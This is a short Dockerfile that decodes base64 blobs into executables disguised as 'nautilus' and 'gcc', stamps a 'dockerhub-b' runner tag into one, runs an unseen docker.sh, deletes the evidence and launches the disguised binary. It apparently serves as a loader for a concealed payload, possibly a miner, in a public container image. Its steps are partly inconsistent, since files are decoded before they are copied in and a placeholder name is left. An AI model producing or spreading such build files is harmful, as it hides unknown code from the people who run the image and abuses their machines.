FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > nautilus.log'

RUN base64 --decode nautilus.64 > nautilus
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY nautilus .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' nautilus
RUN bash ./docker.sh

RUN rm --force --recursive nautilus _REPO_NAME__.64 docker.sh gcc gcc.64

CMD nautilus
